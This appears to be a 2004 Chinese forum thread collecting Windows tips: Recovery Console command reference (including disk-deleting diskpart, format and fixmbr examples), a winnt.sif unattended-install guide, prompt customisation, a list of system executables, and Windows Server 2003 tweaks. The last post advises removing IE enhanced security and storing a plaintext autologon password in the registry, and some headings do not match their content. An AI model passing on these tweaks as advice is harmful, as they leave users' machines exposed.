　　含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符
下使用带有不同参数的 chkdsk 命令。
　　vol [drive:] [ chkdsk [drive:]

[/r]
　　参数　　无
　　如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。
　　drive: 指定要 chkdsk 检查的驱动器。
　　/p　　 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱
动器做任何更改。
　　/r　　 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。
　　注意
　　· Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为
\ %systemroot%\ System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。
如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。

　　Diskpart
　　创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。
　　diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]
　　参数 无
　　如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。
　　/add
　　创建新的分区。
　　/delete
　　删除现有分区。
　　device_name
　　要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：
　　\ Device\ HardDisk0
　　drive_name
　　以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：
　　D:
　　partition_name
　　以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使
用。以下是分区名称的范例：
　　\ Device\ HardDisk0\ Partition1
　　 大小
　　要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。
　　范例
　　下例将删除分区：
　　diskpart /delete \ Device\ HardDisk0\ Partition3
　　diskpart /delete F:
　　下例将在硬盘上添加一个 20 MB 的分区：
　　diskpart /add \ Device\ HardDisk0 20

     Fixboot
　　向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用
fixboot 命令。
　　fixboot [drive]
　　参数　　驱动器
　　将要写入引导扇区的驱动器。它将替代默认的驱动器（即用户登录的系统分区）。
例如，驱动器：D:
　　范例
　　下列命令范例向驱动器 D:的系统分区写入新的分区引导扇区：
　　fixboot d:
　　注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区
引导扇区。

　　Fixmbr
　　修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。
　　fixmbr [ device_name]
　　参数
　　device_name
　　要写入新的主引导记录的设备（驱动器）。设备名称可从 map 命令的输出获得。
例如，设备名称：
　　\ Device\ HardDisk0
　　范例
　　下列命令示例向指定设备写入一个新的主引导记录：
　　fixmbr \ Device\ HardDisk0
　　注意
　　　　· 如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主
系统的驱动器。
　　　　· 如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命
令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录
可能破坏分区表并导致分区无法访问。

　　format
　　将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用
故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。
　　format [ drive:] [ /fs:file-system]
　　参数
　　drive:
　　指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。
　　/q
　　对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化
过的驱动器使用该参数。
　　/fs:file-system
　　指定要使用的文件系统：FAT 、FAT32 或 NTFS 。如果未指定文件系统，将使用
现有的文件系统格式。


　　Map
　　显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令
时非常有用。
　　map 命令仅在使用故障恢复控制台时才可用。
　　Map [ arc]
　　参数
　　arc
　　指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC
设备名称的范例：
　　multi(0)disk(0)rdisk(0)partition(1)
　　等价的设备名称是：
　　\ Device\ HardDisk0\ Partition1
　　范例
　　下例将物理设备名映射为使用 ARC 设备名称的驱动器号：
　　map arc
　　注意
　　· 如果不使用 arc 参数，则 map 命令显示设备名称。
　　· map 命令还显示文件系统的类型和每个磁盘的大小 (MB)。

      Cls
　　清除屏幕。
　　清除后的屏幕只显示命令提示符和插入点。
　　Disable
　　禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。
disable 命令仅在使用故障恢复控制台时才可用。
　　disable {service_name] |[ device_driver_name}
　　参数
　　service_name
　　要禁用的系统服务名称。
　　device_driver_name
　　要禁用的设备驱动程序名称。
　　范例
　　下例将禁用 Eventlog 服务：
　　disable eventlog
　　注意
　　　· disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。
　　　· 使用 disable 命令禁用系统服务或设备驱动程序时，该系统服务或设备驱动
程序上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时使用 enable
命令将启动类型恢复为上次的设置。
　　　· 共有五种启动类型。前三种类型是：SERVICE_AUTO_START 、SERVICE_DISABLED
和SERVICE_DEMAND_START 。对应的标准启动类型：自动、禁用和手动，通常使用“计算
机管理”管理工具中的“服务”进行配置。后两种类型是：SERVICE_BOOT_START 和
SERVICE_SYSTEM_START，通常用于配置加载设备驱动程序的方式。例如，在启动计算机
时或启动 Windows 时加载。

　　Enable
　　启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。
enable 命令仅在使用故障恢复控制台时才可用。
　　enable {service_name |device_driver_name}[ startup_type]
　　参数
　　service_name
　　要启用的系统服务的名称。
　　device_driver_name
　　要启用的设备驱动程序的名称。
　　startup_type
　　要为服务或设备驱动程序指派的启动类型。有效的启动类型包括：
　　　· SERVICE_BOOT_START
　　　· SERVICE_SYSTEM_START
　　　· SERVICE_AUTO_START
　　　· SERVICE_DEMAND_START
　　范例
　　下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START：
　　enable eventlog service_auto_start
　　注意
　　　· 如果不指派启动类型，enable 命令将列出在 service_name 中指定的服务或设
备驱动程序的当前启动类型。
　　　· 使用 enable 命令更改启动类型时，上次启动类型的名称将显示在屏幕上。应
该记下该名称，以便在需要时将启动类型恢复为上次的设置。

       Exit
　　关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时
才可用。
　　exit
　　参数　　无
　　Help
　　提供有关故障恢复控制台命令的联机信息。
　　help [ commandname]
　　参数　　无
　　列出故障恢复控制台中提供的命令。


　　commandname
　　提供有关命令信息，包括命令使用的参数。
　　注意
　　　· 有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称，或
者可以在命令提示符中键入该命令名称和 /?。开关。例如，键入下列命令可以获得有关
extract 命令的信息：
　　　　help extract
　　　　extract /?


　　Listsvc
　　列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台
时才可用。
　　listsvc
　　参数　　无
　　Logon
　　登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。
　　logon
　　参数　　无
　　注意
　　　· logon 命令将列出所有检测到的 Windows 安装，需要安装的本地管理员密码才
能登录。
　　　· 如果 3 次登录尝试都失败，“故障恢复控制台”会退出并且计算机将重新启动。


　　Net use
　　将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制
台时可用。在命令提示符下可以使用带不同参数的 net use 命令。
　　语法
　　net use [ \ \ ComputerName\ ShareName [ /user:[ DomainName\ ] UserName]
password] |[ drive
letter:] [ /d]
　　参数
　　\ \ servername\ sharename
　　指定服务器和共享资源的名称。如果 computername 包含空白字符，则将计算机名从
双反斜杠 (\ \ )到计算机名结尾用引号 (")括起来。计算机名长度可以是 1 到 15 个字符。
　　/user
　　指定建立连接的用户名。
　　域名
　　确认用户的凭据时所要使用的域名。
　　用户名
　　指定登录时使用的用户名。
　　密码
　　指定访问共享资源所需的密码。不输入密码，将给出要键入密码的提示。在密码提
示行处键入密码时不显示密码。
　　/d
　　表示将不断开该连接。

　　Set
　　显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用
的可选命令。
　　含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符
下使用带不同参数的 set 命令。
　　set [ variable=[ string] ]
　　参数
　　variable
　　指定需要设置或修改的变量。
　　“故障恢复控制台”支持以下环境变量：
　　　　变量　　　　　　　　　　 说明
　　AllowWildCards　　　　允许某些命令（如 del 命令）支持通配符。
　　AllowAllPaths　　　　允许访问系统上的所有文件和目录。
　　AllowRemovableMedia　　允许文件复制到可移动媒体上，如软盘。
　　NoCopyPrompt 覆盖现有文件时不显示提示。

　　string
　　指定要与指定变量关联的字符串。
　　范例
　　下例允许在某些故障恢复控制台命令中使用通配符：
　　set allowwildcards=true
　　指定要删除的目录的位置和名称。不能使用通配符。
　　注意
　　　· 目录必须为空否则命令失败。
　　　· Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的
根目录或本地安装源。

　　Systemroot
　　将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。
systemroot 命令仅在使用故障恢复控制台时可用。
　　systemroot
　　参数　　无

---

作者: INGGOOD    时间: 2004-6-11 22:08
无人值守安装 Winnt.sif 文件命令解释
参考资料 - 无人值守安装 Winnt.sif 文件命令解释

　　[Data]

　　AutoPartition=1 or 0
　　如果你在这里设置为1，Windows的安装程序就会在任意一个有足够可用空间的硬盘分区上安装操作系统。如果你删除这一行或者把值设置为0，则安装程序会在安装过程中讯问你要把操作系统安装到哪个硬盘分区，并且如果该分区已经包含了一个操作系统，安装程序也会给你合理建议。

　　MsDosInitiated = "0" or "1"
　　如果你在这里设置为0，则会通知安装程序，你是从光盘上安装操作系统的，如果你准备用软盘引导系统并从硬盘上安装，则在这里设置为1。

　　UnattendedInstall = "Yes"
　　如果这里设置为Yes，则安装程序会进行一次无人值守安装。

　　[Unattended]

　　UnattendMode=FullUnattended
　　在这里设置为FullUnattended 将会进行一次完全自动的无人值守安装，在安装过程中遇到的所有问题都将由在winnt.sif文件中预设的答案来回答，在安装过程中你将不能改变任何预设值。其他值得含义你可以在Winnt.sif 部份所提供的Ref.chm 文件中找到。

　　OemSkipEula=Yes or No
　　在这里设置为Yes 将会跳过EULA 屏幕，因为你已经在创建应答文件的时候读过用户许可协议了。在这里设置为No则意味着你需要在安装过程中按F8键同意许可协议。

　　OemPreinstall=No or Yes
　　这个选项默认设置为No，但是如果你还想在安装系统的过程中从$OEM$/$1文件夹下安装额外的程序，你就应该把它设置为Yes，这样安装程序就会知道这次的安装会发布其他程序，而预先把相应的安装文件复制到系统盘中。

　　TargetPath=\WINDOWS
　　这个选项告诉了安装程序要把Windows安装到哪个目录中。

　　Repartition=No
　　这个选项可以选择是否自动删除目标计算机上的所有分区并用NTFS文件系统格式化硬盘。

　　UnattendSwitch="no"
　　这个选项可以用来选择是否在用光盘引导系统进行安装后跳过欢迎屏幕。

　　重要:

　　如果你在这里选择了Yes，那么后面对于注册表HKEY_CURRENT_USER部分的调整以及Powertoys中的一些设置九只能应用到默认的Administrator帐户上了。而你后来新建的用户帐户就无法应用这相应的设置。所以在这里要选择No，这样安装结束后你可以看到Windows 欢迎（就是让你输入用户名以及询问是否注册的页面，只在装好操作系统第一次运行的时候出现 ），在欢迎屏幕上你可以是如一个新的用户名，接着就会登陆。而批处理文件这时候才会被执行，相应的注册表调整就可以应用到你的帐户上了

WaitForReboot="No"
　　这个选项用来决定计算机是否在图形界面的安装进行完毕后等待15秒。设置为No则可以禁止等待。

　　OemPnPDriversPath="Drivers\Catalyst3_6\2KXP_INF;Drivers\asus\sound\"
　　在这一行你可以告诉安装文件到哪里搜索比操作系统自带的驱动程序更新的版本。如果安装程序能找到一个更好的版本，则会自动安装。你可以在驱动程序页面看到更详细的解释。

　　DriverSigningPolicy=Ignore
　　这个选项可以强制安装程序安装没有经过WHQL认证的驱动程序。这个选项要和OemPnPDriversPath选项联合使用。

　　AutoActivate = Yes
　　这个选项可以自动激活你的Windows XP。如果你想要自动激活Windows，你首先必须设置一个Internet连接，而且也要确保你的产品序列号已经写在[UserData]字段下。

　　[GuiUnattended]

　　AdminPassword = (你的密码) 或者 *
　　这个选项可以让你为inde Windows XP中的Administrator帐户设置密码。如果你在这里输入* 则意味着没有设置任何密码。means no password will be set.（在设置密码的时候记得把括号删掉）。

　　EncryptedAdminPassword=Yes 或者 No
　　这个选项用来告诉安装文件你的密码是否被加密，Yes表示密码被加密了，而No表示密码为被加密。如果你没有为Administrator帐户设置密码，那么这个选项应该被设置为No。如果你选择了Yes，Setup Manager就会把密码加密保存在winnt.sif文件中。

　　OEMSkipRegional=0 或者 1
　　这个选项设置为0会显示区域设置屏幕，而设置为1就可以跳过这个屏幕。

　　TimeZone=85
　　这个选项告诉安装程序时区的设置，例如GMT标准时间的值是85，每个不同的时区都由相应的数值表示，一个完整的时区和数值对照表可以在部署工具的ref.chm文件中看到。

　　OemSkipWelcome=0 或者 1
　　如果上面的OemPreinstall选项你设置为No，那么这个选项你就要设置为0；而如果OemPreinstall选项设置为Yes，则这个选项就要设置为1。如果设置为0，安装程序就会知道你不想在图形界面的安装过程中显示欢迎屏幕。

　　[Display]

　　BitsPerPel=32
　　这个选项指定了屏幕的色彩位数。可用的值有：32，24，16，还有8（也就是256色）。

　　Xresolution=1024
　　这个选项指定了屏幕的默认横向分辨率。

　　Yresolution=768
　　这个选项指定了屏幕的默认纵向分辨率。

　　Vrefresh=85
　　这个选项设置了屏幕的刷新率。请确保这个设置没有超出你的显示器的可用范围，否则很有可能损坏显示器。

　　[UserData]

　　ProductKey=xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
　　这个选项告诉了安装程序在安装过程中使用的序列号

　　FullName="Insert Name"
　　这个选项用来指定你的名字，这将会显示在系统属性的”注册给“下。

　　OrgName="Insert Organisation Name"
　　这个选项可以用来设置你的组织名称，这个也会显示在系统属性的“注册给”下。

　　ComputerName=Insert Name
　　在这个选项中你可以指定计算机的名称，这个名称会用在系统和网络中，而且该名称也会在系统属性的计算机名选项卡下。


[TapiLocation]

　　CountryCode=44
　　这个选项用来设置国家代码，例如英国就是44。对于其他国家的代码请参考部署工具中的ref.chm文件。

　　Dialing=Tone
　　这个选项用来指定你的电话线路类型，可用的值是Tone和Pulse。

　　[RegionalSettings]

　　LanguageGroup=1
　　这个选项用以指定安装的语言组类型，详细信息请参考部署工具中的ref.chm文件。

　　Language=00000809
　　这个选项用以指定安装的语言类型，详细信息请参考部署工具中的ref.chm文件。

　　[Identification]

　　JoinWorkgroup=WORKGROUP
　　这个选项用以指定将要加入的工作组。如果你没有使用网络，就可以把这个选项保持默认设置。

　　[Networking]

　　InstallDefaultComponents=Yes or No
　　这个选项用以告诉安装程序你是否安装默认的网络组件。如果你设置了Yes那么默认的网络组件就会被安装；如果你设置了No就可以自定义要安装的协议、服务还有客户端。配置该选项的最佳方法是通过Setup Manager（setupmgr.exe）。

　　[Components]

　　msmsgs=off
　　这个选项可以让安装程序不安装 Windows Messenger 4.6

　　msnexplr=off
　　这个选项可以让安装程序不安装 MSN Explorer 7.

　　freecell=off
　　这个选项可以让安装程序不安装 空当接龙游戏。

　　hearts=off
　　这个选项可以让安装程序不安装 红心大战游戏。

　　minesweeper=off
　　这个选项可以让安装程序不安装 扫雷游戏。

　　pinball=off
　　这个选项可以让安装程序不安装 三维弹球游戏。

　　solitaire=off
　　这个选项可以让安装程序不安装 纸牌游戏。

　　spider=off
　　这个选项可以让安装程序不安装 蜘蛛纸牌游戏。


zonegames=off
　　这个选项可以让安装程序不安装 MSN Zone 在线游戏。

　　[Shell]

　　CustomDefaultThemeFile = "%WinDir%\Resources\Themes\MyTheme.theme"
　　这个选项用以指定默认情况下Windows 使用的主题，所指定的可以是系统自带的其他主题，或者是第三方的主题。通过指定这个选项，Windows XP在你第一次登陆的时候就可以使用你喜欢的主题了。

　　DefaultStartPanelOff = Yes
　　这个选项告诉安装程序Windows XP将会使用经典开始菜单，并且像其他程序一样在桌面上显示我的电脑、我的文档的图标。如果这个选项设置为No，安装程序就会使用默认的Windows XP 开始菜单。

　　DefaultThemesOff = Yes
　　这个选项用以告诉安装程序使用Windwos 经典主题。注意：如果你把CustomDefaultThemeFile设置为Yes，那么这个选项将会覆盖CustomDefaultThemeFile 选项。

　　[GuiRunOnce]

　　%systemdrive%\install\main_batch.cmd
　　%systemdrive%\install\hotfixes.cmd
　　%systemdrive%\install\applications.cmd

　　GuiRunOnce 字段是用来指定批处理文件位置的，在这里指定的批处理文件会在安装程序运行完毕并登录系统后运行。当管理员帐户（或者你自己的账户）登录系统后载入Windows 外壳之前就会自动执行这里的批处理文件，而这些批处理文件的详细内容你可以在左侧导航栏的“无人值守安装”下看到。

---

作者: LINTEC88    时间: 2004-6-11 22:09
打造超COOL的命令提示符
1． 彩色的命令行
　　在默认情况下，命令行是黑底白字，但如果你是一个新潮的DIYer狂，想打造一个个性十足的命令行窗口，不妨为总是一成不变的命令行窗口变一变颜色，披上一身彩衣，一定会让别人大吃一惊！

　　单击“开始→程序→附件→命令提示符”，在命令行提示符下输入“color 02”后回车，看一看，命令行窗口是不是立刻变成了黑底绿字？再试试输入“color f4”，是不是命令行窗口又变成了白底红字？有意思吧！

　　“color”是Windows2000/XP/2003中特有的命令，主要功能就是用来改变命令行窗口的颜色。颜色属性由两位数指定：第一位是背景色，第二位是前景色，也就是文字的颜色。不明白用法的朋友可以在命令行提示符下输入“color /？”来获得详细的帮助，如图1所示。

2． 让命令行带上时钟

　　在Windows下，我们可以通过系统任务栏显示的系统时间来随时了解当前的时间，以便合理地安排手中的工作。但是在命令行下，如果我们已经将命令行窗口最大化了，就无法通过系统的任务栏来掌握当前时间，必须将最大化的命令行窗口转换为小窗口，才能看到系统的时间，非常麻烦。如果在命令行窗口中能随时随地掌握系统的时间，那该有多好呀。现在就让我们梦想成真！

　　在命令行提示符下输入“Prompt $T $P$G”，回车，现在看看，命令行上是不是已经显示出系统的当前时间（如图2）？而且这个小时钟会随着你每一次回车自动更新，挺好吧！

3． 给命令行提示符变变脸

　　平时大家所见到的命令行提示符都是千篇一律的“C:\>”（Windows 98下）或“C:\Documents and Settings\用户名>”（Windows 2000/XP/2003下），显得死气沉沉。现在就让我们一起来改造一下命令行提示符，让它充满新意，彰显个性。

　　假如你想将命令行提示符变为“C:\Windows==>”，就输入“prompt $T $P$Q$Q$G”。假如你想把命令行提示符变为“Windows98[版本号]>”，就输入“Prompt $T $V$G”。键入“Prompt/？”可以查看到各种有意思的参数，如图3所示。灵活运用这些参数，你就可以打造出百变的命令行提示符！比如你想让命令行显示自己的计算机名，那才够酷。在DOS提示符下输入“prompt [%Computername%] $P$Q$Q$G”即可。

4． 一劳永逸，让命令符酷起来

　　有了上述方法，给命令行或MS-DOS扮酷是不是很容易，也很有意思，但是每次进入到命令行提示符状态下，都要输入命令才行，有没有一个一劳永逸的办法呢？哈哈，懒人自有懒福，方法有三。

　　方法1 单击“开始→运行”，在运行对话框中输入“REGEDIT”，进入注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]分支。在右侧窗口中新建一字符串值，命名为“AutoRun”，并将其数值设为“prompt <$t $p$Q$$$D$V$L$B$g>”，“<$t $p$Q$$$D$V$L$B$g>”表示你想用的参数形式。例如我们想把命令行提示符变为：“09:08:10(时间)C:\Windows==>"的形式，就输入“prompt $t $p$q$q$g”。设置完毕后退出注册表即生效。注意该方法仅适用于Windows 2000/XP/2003。

　　方法2 用于记事本打开系统根目录下的“Autoexec.bat”文件，如没有，请新建一个。在其中输入“prompt <$t $p$Q$$$D$V$L$B$g>”，“<$t $p$Q$$$D$V$L$B$g>”表示你想用的参数形式。例如我们想把命令行提示符变为：“[WIN98] 09:08:10(时间)C:\Windows==>”的形式，就输入“Prompt [WIN98] $t $p$q$q$g”，存盘后重新启动计算机，命令行提示符就会变成我们想要的样子了（适用于Windows 98）。

　　方法3 用记事本打开系统根目录下的“Autoexec.bat”文件。在其中输入 “Sets Winpmt=[任意你想用的表达式] <$t $p$Q$$$D$V$L$B$g>”。例如我们想把命令行提示符变为：“[Windows 98] 09:08:10(时间)C:\Windows==>"的形式，就输入“set winpmt=[Windows 98] $t $p$q$q$g”，存盘后重新启计算机，命令行提示符就会变成我们想要的样子了（适用于Windows 98）。

　　注意：Winpmt是系统环境变量，各参数的含义与Prompt命令各参数的含义完全相同。

---

作者: liuyanguestc2    时间: 2004-6-11 22:10
叫windows变成透明
accstat.exe windows 辅助状态指示器
　　arp.exe tcp/ip地址转换协议命令
　　calc.exe 计算器应用软件
　　cdplayer.exe cd播放器附件
　　cleanmgr.exe 磁盘清理程序
　　clipbrd.exe 剪贴板查看应用程序
　　command.com ms－dos方式
　　control.exe 控制面板应用程序
　　cvt1.exe fat32转换器
　　defrag.exe 磁盘碎片整理应用程序
　　drvspace.exe 磁盘空间管理应用程序
　　dialer.exe 电话拨号程序
　　directcc.exe 直接电缆连接
　　explorer.exe 资源管理器
　　extrac32.exe windows cab 文件解压缩应用程序
　　fontview.exe 字体查看程序
　　filexfer.exe microsoft文件传输应用程序
　　finger.exe 用于获得来自于运行标准finger服务的任何系统的用户信息
　　freecell.exe 空当接龙游戏
　　grpconv.exe 程序组转换器
　　hostname.exe 返回tcp/ip配置窗口的dns标题头窗口中定义的计算机名字
　　ipconfig.exe 快速浏览系统tcp/ip配置应用程序
　　kodakprv.exe 映像预览应用程序
　　mplayer.exe 媒体播放机
　　mshearts.exe 红心大战游戏
　　nbtstat.exe 显示tcp/ip上的netbios（netbt）的状态
　　net.exe 一个非常全的网络配置、显示网络信息的命令,有详细帮助
　　netstat.exe 用于检查所有tcp、ip以及udp连接的统计情况
　　netdde.exe windows 网络dde（动态数据交换）
　　netwatch.exe 网络监视器
　　notepad.exe 记事本应用程序
　　packager.exe 对象包装应用程序
　　pbrush.exe 画笔应用程序
　　ping.exe 检测网络远端主机是否存在及判断网络是否正常的检测工具
　　progman.exe windows3.x中的程序管理器
　　qfecheck.exe 更新信息工具
　　regedit.exe 注册表编辑器
　　route.exe 用于管理本地tcp/ip路由表的应用程序
　　rsrcmtk.exe 显示资源状况
　　rundll32.exe 将dll作为应用程序运行
　　scandskw.exe 磁盘扫描应用程序
　　smartdrv.exe smartdrive（dos磁盘缓冲器）应用程序
　　sigverif.exe microsoft 签字应用程序
　　sndrec32.exe 录音机附件
　　sndvol32.exe 音量控制
　　sol.exe 纸牌游戏
　　sysmon.exe 系统监视器
　　taskman.exe 任务执行栏应用程序
　　taskmon.exe 任务监视器应用程序
　　telnet.exe 虚拟终端程序
　　tftp.exe 小文件传送协议，允许将文件传送给tftp服务器
　　tracert.exe 决定用户的系统与目标系统之间的路径
　　tuneup.exe windows 调整向导
　　vcmui.exe 版本冲突管理器
　　wangimg.exe 映像应用程序
　　welcome.exe 欢迎光临widows实用程序
　　winfile.exe windows3.x中的文件管理器
　　winhelp.exe 16位的windows 帮助程序
　　winhlp32.exe 32位的windows 帮助程序
　　wininit.exe windows 安装初始化应用程序
　　winipcfg.exe tcp/ip 配置实用程序
　　winmine.exe 扫雷游戏
　　winpopup.exe windows 弹出式消息实用程序
　　winver.exe 显示windows 版本号
　　write.exe 写字板附件
　　winrep.exe windows 报告工具
　　winalign.exe 排列本地文件应用程序
　　wupdmgr.exe windows 更新工具

　　二、C:\Windows\system下的可执行文件

　　accwiz.exe windows辅助工具向导
　　actmovie.exe directshow 安装工具
　　addreg.exe windows 注册调整工具
　　awadpr32.exe 传真打印机安装程序
　　brdiag.exe 诊断打印机是否连接着、并口连接是否正确等
　　cfgwiz32.exe microsoft isdn（综合业务数字网）配置向导
　　ddhelp.exe directx 帮助程序
　　dialmon.exe 拨号监视器
　　dllhost.exe com 代理
　　dmconfig.exe 桌面管理配置程序
　　dplaysvr.exe microsoft directplay 服务
　　drwatson.exe 华文医生错误监视器
　　gdi.exe windows图形设备接口核心组件
　　ieshwiz.exe ie自定义文件夹向导
　　imgst_tr.exe microsoft 试验程序
　　internat.exe 键盘语言指示器（applet）
　　imgstart.exe microsoft 交互式试验程序
　　jdbgmgr.exe 调试本地服务器
　　krnl386.exe windows 系统核心组件
　　lights.exe 调制解调器监视器（applet）
　　lmscript.exe windows nt 的登录脚本处理程序
　　magnify.exe 屏幕放大工具
　　mprexe.exe 多供应者路由器
　　msconfig.exe 系统配置实用程序
　　msgsrv32.exe windows 32－bit vxd 信息服务器
　　mstask.exe 计划任务执行程序
　　msnexch.exe microsoft联机服务
　　nwlsproc.exe netware for win32 登录脚本处理程序
　　odbcad32.exe odbc数据源配置
　　pintsetp.exe 微软拼音安装程序
　　pintlphr.exe 微软拼音输入法用户自造词
　　rnaapp.exe 拨号上网应用程序
　　regsvr32.exe microsoft 注册服务程序
　　regwiz.exe microsoft注册向导
　　rpcss.exe 分布式com服务
　　sfc.exe 系统文件检查程序
　　srw.exe 系统恢复程序
　　stimon.exe 静止图像设备管理器
　　sysedit.exe 系统配置编辑程序
　　tcmsetup.exe 电话客户安装程序
　　tshoot.exe 系统疑难问题解答
　　user.exe 用户界面核心部件
　　walign.exe 调整应用程序启动
　　wrkgadm.exe 工件组管理员

　　三、C:\Windows\Command下的几个实用程序

　　你是否曾在Windows的DOS方式下显示过汉字文本文件，打开却是一堆乱码，或者想windows的DOS方式下输入汉字，你可能会想到UCDOS等汉字操作系统，那就有点太大材小用了。不妨看看下面几个可执行文件，可以轻松解决这个问题。
　　PDOS95.bat 启动Windows下的中文DOS方式。启动后，就可在DOS方式下显示汉字文件、输入汉字。按Ctrl＋F10可改变显示风格、输入风格、打印风格等，用Ctrl＋Shift可切换输入法，用Quit命令退出中文DOS方式。

　　PDOS95.bat的默认内容

　　pbios.exe 启动中文系统内核
　　font16.exe 16×16字体驱动程序
　　hzvio95.exe dos7.0中文版显示驱动程序
　　hzkbd.exe 通用词典输入法
　　instdict pinyin 安装拼音输入法
　　instdict shanpin 安装双拼输入法
　　instdict quwei 安装区位输入法
　　instdict guobiao 安装国标输入法
　　ctrlpan.exe 系统控制台程序
　　csetup.exe microsoft msdos中文系统设置程序
　　foutline.exe 轮廓字驱动程序
　　lq1600k.exe lq1600k打印驱动程序
　　hplj600.exe hplj 6000pi打印驱动程序
　　prtmon.exe 打印监控程序
　　quit.exe 退出中文dos方式
　　sfc.exe 系统文件检查程序
　　srw.exe 系统恢复程序
　　stimon.exe 静止图像设备管理器
　　sysedit.exe 系统配置编辑程序
　　tcmsetup.exe 电话客户安装程序
　　tshoot.exe 系统疑难问题解答
　　user.exe 用户界面核心部件
　　walign.exe 调整应用程序启动

---

作者: wangyangybs    时间: 2004-6-11 22:12
全面优化windows 2003
一、跳过磁盘检修等待时间

一旦计算机因意外原因，例如突然停电或者死机的话，那么计算机下次重新启动的话，系统就会花10秒钟左右的时间，来运行磁盘扫描程序，检查磁盘是否有错误出现。要是你是一位惜时如金的人，肯定不会白白等待下去的。那就跟我一起来，跳过这段检查等待时间吧：

　 1、在开始菜单中，依次执行“程序”/“附件”/“命令提示符”命令，将界面切换到DOS命令行状态下； 　　

2、直接输入“CHKNTFS/T :0”命令，单击回车键后，系统就能自动将检查磁盘的等待时间修改为0了； 　　

3、下次遇到异常情况，重新启动计算机后，系统再调用磁盘扫描程序时，就不需要等待了。　　

　　二、取消对网站的安全检查

　　新安装好Windows Server

　　2003操作系统后，打开浏览器来查询网上信息时，发现IE总是“不厌其烦”地提示我们，是否需要将当前访问的网站添加到自己信任的站点中去；要是不信任的话，就无法打开指定网页；倘若信任的话，就必须单击“添加”按钮，将该网页添加到信任网站的列表中去。不过每次访问网页，都要经过这样的步骤，显然就太烦琐了。其实我们可以通过下面的方法来让IE取消对网站安全性的检查：

1、依次执行“开始”/“设置”/“控制面板”命令，在打开的控制面板窗口中，用鼠标双击“添加和删除程序”图标，将界面切换到“添加和删除Windows组件”页面中；

　 2、用鼠标选中“Internet Explorer增强的安全配置”选项，继续单击下一步按钮，就能将该选项从系统中删除了；

　 3、再单击一下“完成”按钮，退出组件删除提示窗口。

　 以后，再上网的时候，IE就不会自动去检查网站的安全性了，这样就能少了不少麻烦。 　　

　　三、自动进入Windows Server 2003系统

　 每次开机运行Windows Server

　　2003系统时，都需要同时按住Ctrl+Alt+Delete复合键，再输入登录密码，才能进入到系统中；要是需要频繁登录系统的话，大家可能就会受不了这样罗嗦的步骤了。此时，大家不妨按照下面的步骤，来让系统自动完成登录操作：

　 1、在运行对话框中，输入注册表编辑命令regedit，来打开注册表编辑窗口；

　 2、在该窗口中，依次展开HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\WindowsNT\Current Version\WinLogon键值； 　　

　 3、在对应右边的子窗口中，用鼠标右键单击空白处，从弹出的快捷菜单中，依次执行“新建”/“字符串”命令，来创建一个字符串类型的键名，并将键名设置为“AutoAdminLogon”，并将该键名的数值设置为“1”；

4、找到“DefaultDomainName”键名，并用鼠标双击之，在随后出现的窗口中，输入要登录的域名，例如Department；

5、双击“DefaultUserName”键名，在随后打开的窗口中，直接输入要登录到此域的用户名，例如“test”；

　 6、在WinLogon右边的子窗口中，用鼠标右键单击空白处，从弹出的快捷菜单中，依次执行“新建”/“字符串”命令，来创建一个字符串类型的键名，并将键名设置为“DefaultPassword”，并将该键名的数值设置为用户登录系统的密码，例如用户test的登录密码为“123456”；

　 7、完成设置后，重新启动计算机时，我们会发现不需要再登录，就能自动进入到Windows Server 2003系统中了。以后要取消自动登录功能的话，可以将“AutoAdminLogon”键值设置为“0”就可以了。　四、取消关机原因的提示

　 在关闭Windows Server

　 2003操作系统时，系统会弹出一个提示窗口，要求大家选择关闭计算机的原因选项；尽管这种方法可以增强系统的安全性，确保用户更有效地管理和维护计算机；不过每次关机或者重新启动系统，都要选择关机原因，实在没有必要。所以，为了进快地关闭计算机，大家可以按下面步骤来取消关机原因的提示： 　　

